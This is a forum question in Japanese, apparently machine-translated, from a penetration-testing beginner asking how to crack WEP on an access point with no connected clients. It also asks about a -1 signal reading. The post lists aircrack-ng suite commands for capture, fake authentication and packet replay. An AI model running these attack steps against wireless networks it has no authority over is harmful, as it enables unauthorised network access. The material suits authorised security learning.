私は侵入テストの初心者で、airodump-ng と aireplay-ng を正しく使用して AP の WEP 暗号化を突破する方法を学ぼうとしています。
IV を収集するために ARP パケットを再注入することで、AP に接続されたクライアントのパスワードを取得することができました。ワイヤレス クライアントなしで WEP をクラックする方法に関する aircrack-ng.org の記事を読みましたが、うまくいかないようです。再注入するパケットをリッスンしようとしましたが、クライアントが接続されていないため、AP は沈黙しているようです。クライアントをネットワークに接続せずに AP にパケットを送信させる方法はありますか。または、暗号化を破る他の方法はありますか。
また、airodump-ng でリストされているネットワークの中には、信号強度が -1 と報告されているものもあります。これは、距離が遠すぎることを意味していると思います。私の推測は正しいでしょうか?
私は Arch Linux で aircrack-ng スイートを使用しており、essid がブロードキャストされています。
私が使用しているコマンド:
airomon-ng start [wlanインターフェース]
airodump-ng -w 出力ファイル -c [チャンネル] --bssid [mac_of_ap] [モニターインターフェース]
偽の認証: aireplay-ng -1 0 -a [APのBSSID] -h [ワイヤレスカードのMac]
または AP と継続的に再関連付けする:
aireplay-ng -1 6000 -o 1 -q 10 -e [Essid] -a [mac_of_ap] -h [ワイヤレスカードのMac] [モニターインターフェース]
このコマンドは、AP が送信する最初のパケットを取得して、それを再挿入することになっています: aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [AP の BSSID] -h [WIC の Mac] mon0